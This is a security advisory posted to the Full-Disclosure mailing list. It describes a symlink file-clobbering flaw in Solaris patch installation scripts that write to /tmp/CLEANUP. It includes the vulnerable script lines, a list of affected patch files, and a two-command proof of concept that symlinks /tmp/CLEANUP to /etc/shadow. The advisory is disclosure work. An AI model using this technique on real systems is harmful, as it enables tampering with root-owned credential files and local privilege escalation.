[<prev] [next>] [day] [month] [year] [list]
Message-ID: <914ab1dd4c7df8c70d848b6afe2f9c84@fbi.dhs.org>
Date: Wed, 24 Mar 2010 12:39:44 -0400
From: bugs <bugs@....dhs.org>
To: <full-disclosure@...ts.grok.org.uk>
Subject: /tmp symlink file clobbering with Solaris Update
Manager
Symlink attack with Solaris Update manager and Sun Patch Cluster
Larry W. Cashdollar
Vapid Labs http://vapid.dhs.org
1/24/2009
Many patches use insecure file creation in /tmp to store data during
installation. The easiest one to exploit is /tmp/CLEANUP which is used in
a handful of package installation scripts:
script code is typically:
CLEANUP_FILE=/tmp/CLEANUP
echo "EXISTING_FILE_PRESERVED: ${dest} ${dest}.${TAG}" \
>> ${CLEANUP_FILE}
Similar code is found in:
./118833-36/SUNWcsr/install/i.renamenew
./118833-36/SUNWcsr/install/u.initd
./118833-36/SUNWcsr/install/i.initd
./118833-36/SUNWcsr/install/preinstall
./118833-36/SUNWintgige/install/i.renamenew
./118833-36/SUNWvolr/install/u.initd
./118833-36/SUNWvolr/install/i.initd
./118833-36/SUNWsndmu/install/postinstall
./118833-36/SUNWsacom/install/i.initd
./118833-36/SUNWsacom/install/u.initd
./118833-36/SUNWsndmr/install/postinstall
./118833-36/SUNWsndmr/install/i.renameold
./120272-26/SUNWsmmgr/install/u.initd
./120272-26/SUNWsmmgr/install/i.initd
./137093-01/SUNWcsr/install/i.renameold
./137137-09/SUNWnxge.u/install/i.renameold
./137137-09/SUNWcsr/install/i.renamenew
./137137-09/SUNWcsr/install/i.renameold
./137137-09/SUNWckr/install/i.renameold
./137137-09/SUNWnxge.v/install/i.renameold
./141444-09/SUNWixgbe/install/i.renamenew
./141444-09/SUNWnxge.u/install/i.renamenew
./141444-09/SUNWnxge.v/install/i.renamenew
./127127-11/SUNWtsg/install/preinstall
./127127-11/SUNWtsg/install/i.renamenew
./127127-11/SUNWtsu/install/i.renamenew
./127127-11/SUNWypr/install/i.renameold
./127127-11/SUNWcsr/install/i.group
./127127-11/SUNWcsr/install/i.pamconf
./127127-11/SUNWcsr/install/i.passwd
./127127-11/SUNWcsr/install/i.renamenew
./125555-06/SUNWcsu/reloc/usr/lib/patch/patch_override_dir/137137_SUNWnxge_i.renameold
./122660-10/SUNWcsr/install/preinstall
./119313-29/SUNWwbcor/install/i.initd
./119313-29/README.119313-29
./120011-14/SUNWckr/install/i.renameold
./120011-14/SUNWcsr/install/i.renamenew
./120011-14/SUNWcsr/install/i.renameold
./120011-14/SUNWcsr/install/preinstall
./120011-14/SUNWsndmu/install/postinstall
./120011-14/SUNWsndmr/install/i.renameold
./121453-02/undo_pkgs.pkg
./121453-02/payload.pkg
./121453-02/SUNWppror/install/i.initd
./122911-19/README.122911-19
./122911-19/SUNWapchr/install/i.initd
./122911-19/SUNWapchr/install/i.renamenew
./122911-19/SUNWapchr/install/u.initd
./122911-19/SUNWtcatr/install/i.renamenew
./139555-08/SUNWcsr/install/i.renamenew
./120543-15/SUNWapch2r/install/i.renamenew
./125215-03/SUNWwgetr/install/i.renamenew
If a user creates a symlink to a root owned file, /etc/shadow for example
it will be clobbered by the patch installation process if that patch
application applies to the system.
$ cd /tmp
$ ln -s /etc/shadow CLEANUP
I was able to append the contents of CLEANUP to /etc/shadow.
With the GUI Sun Update Manager being used to install patches on a system
local users can easily run scripts and create symlinks in an attempt to
clobber files and potentially escalate priviledges as this application is
typically run in multi user mode.
There are other attackable files that are created as well. I have only
investigated the easiest one however.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists